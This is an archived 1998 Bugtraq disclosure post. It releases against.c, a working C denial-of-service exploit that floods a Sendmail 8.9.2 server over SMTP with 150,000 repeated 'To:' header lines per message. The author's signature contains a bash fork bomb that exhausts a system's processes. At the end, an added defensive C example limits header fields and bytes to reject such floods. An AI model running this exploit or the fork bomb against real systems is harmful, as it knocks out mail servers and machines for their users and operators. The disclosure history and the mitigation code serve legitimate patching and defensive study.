Sendmail 8.9.2 Denial of Service exploit code.
94909bd0dc366bd42f8c781b305c85ac38cce1c99b9811467f3d2efef15067f9
Date: Sat, 12 Dec 1998 19:39:56 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want!
----------------------------------------
Hello again. Yesterday, I published some rather laconic information about
two bugs in Sendmail up to 8.9.2, and decided to post only a short
description of the problem + suggested patch (instead of an exploit), to give
developers a chance. Unfortunately, I put together information about two
completely different problems in a single posting, and it confused a lot of
people. So, to kill any senseless discussions - again:
- The first one was the 'redirection attack'; I said you could call it a 'bug'
instead of a 'feature', but as no one likes anonymous mailbombing,
network overloading / scanning, it's good to apply the sendmail.cf patch
included in the original posting; without it, your relay could be abused in
many painful ways. And yes, the attack has been confirmed with 8.9.2 and
sendmail.cf from 8.9.2 with relaying enabled. I don't think there's
anything left to talk about. Dot.
- The second one was a DoS attack during header parsing - and this is
a bug, *confirmed on 8.9.2*. I included a simple patch to the source tree.
Unfortunately, all feedback we received from developers was a one-line
response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided
not to publish an exploit, but now I realize there's no chance for a
response from vendors if there's no real danger. So here it is.
The attached file, against.c, should perform a very 'light' attack, only
for testing purposes. If you notice increased LA during the attack,
your machine is vulnerable. You have had enough time to patch your system
- don't blame me, but the vendors. EOF.
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
To iterate is human, to recurse divine [P. Deutsch]
------------------------------snip here----------------------------------
/*
against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
(c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>
Usage: ./against existing_user_on_victim_host victim_host
Example: ./against nobody lamers.net
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/wait.h>      /* waitpid() */
#include <netinet/in.h>
#include <netdb.h>

#define MAXCONN 5          /* SMTP sessions opened, one after another */
#define LINES   150000     /* "To: x" header lines sent in each message */

struct hostent *hp;
struct sockaddr_in s;
int suck, x;

int main(int argc, char *argv[]) {
    int conn, status;

    printf("against.c - another Sendmail DoS (up to 8.9.2)\n");
    if (argc != 3) {
        printf("Usage: %s victim_user victim_host\n", argv[0]);
        exit(1);
    }
    hp = gethostbyname(argv[2]);
    if (!hp) {
        perror("gethostbyname");
        exit(1);
    }
    fprintf(stderr, "Doing mess: ");
    for (conn = 0; conn < MAXCONN; conn++) {
        x = fork();
        if (x < 0) { perror("fork"); exit(1); }
        if (x == 0) {
            /* child: one SMTP session carrying a message whose header
               section consists of LINES identical "To:" lines */
            FILE *d;
            int line;
            memcpy(&s.sin_addr, hp->h_addr_list[0], hp->h_length);
            s.sin_family = hp->h_addrtype;
            s.sin_port = htons(25);
            if ((suck = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); }
            if (connect(suck, (struct sockaddr *)&s, sizeof(s))) { perror("connect"); exit(1); }
            if (!(d = fdopen(suck, "w"))) { perror("fdopen"); exit(1); }
            usleep(100000);
            fprintf(d, "helo tweety\n");
            fprintf(d, "mail from: tweety@polbox.com\n");
            fprintf(d, "rcpt to: %s@%s\n", argv[1], argv[2]);
            fprintf(d, "data\n");
            usleep(100000);
            for (line = 0; line < LINES; line++) {
                if (!(line % 100)) fprintf(stderr, ".");
                fprintf(d, "To: x\n");
            }
            fprintf(d, "\n\n\nsomedata\n\n\n");
            fprintf(d, ".\n");
            sleep(1);
            fprintf(d, "quit\n");
            fflush(d);
            sleep(100);                  /* keep the session open for a while */
            shutdown(suck, SHUT_RDWR);
            close(suck);
            exit(0);
        }
        /* parent: wait for this session to finish before starting the next */
        waitpid(x, &status, 0);
    }
    fprintf(stderr, "ok\n");
    return 0;
}
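For the receiving side, the following is an added example (not sendmail's code and not part of the original posting) of the kind of check that refuses the header flood against.c sends before the full header block is ever parsed: it streams through the header section, counts header fields and header bytes, and stops at the first line that exceeds a limit. MAX_HEADER_FIELDS and MAX_HEADER_BYTES are assumed values, and flood_result() builds a constructed sample shaped like the against.c payload.

```c
#include <stddef.h>
#include <string.h>

/* Assumed limits for this example; a real MTA would make them configurable. */
#define MAX_HEADER_FIELDS 1000
#define MAX_HEADER_BYTES  32768

/* Scan the header section of a message (everything before the first empty
 * line). Returns the number of header fields, or -1 as soon as either limit
 * is exceeded, so a flood is refused before the parser sees the whole block.
 * Lines starting with SP or HTAB are folded continuations, not new fields. */
int check_header_limits(const char *msg, size_t max_fields, size_t max_bytes)
{
    size_t fields = 0, bytes = 0;
    const char *p = msg;

    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) + 1 : strlen(p);
        size_t body = len;                  /* length without the line ending */
        if (body && p[body - 1] == '\n') body--;
        if (body && p[body - 1] == '\r') body--;
        if (body == 0)
            break;                          /* blank line: end of headers */
        bytes += len;
        if (p[0] != ' ' && p[0] != '\t')
            fields++;
        if (fields > max_fields || bytes > max_bytes)
            return -1;
        p += len;
    }
    return (int)fields;
}

/* Constructed sample: n_lines copies of "To: x", the shape of the against.c
 * payload, checked against the assumed limits. */
int flood_result(size_t n_lines)
{
    static char buf[64 * 1024];
    size_t used = 0;

    while (n_lines-- > 0 && used + 6 < sizeof buf) {
        memcpy(buf + used, "To: x\n", 6);
        used += 6;
    }
    buf[used] = '\0';
    return check_header_limits(buf, MAX_HEADER_FIELDS, MAX_HEADER_BYTES);
}
```

A normal message passes with its field count returned, while flood_result(2000) is rejected at the 1001st "To:" line without reading the remaining ones.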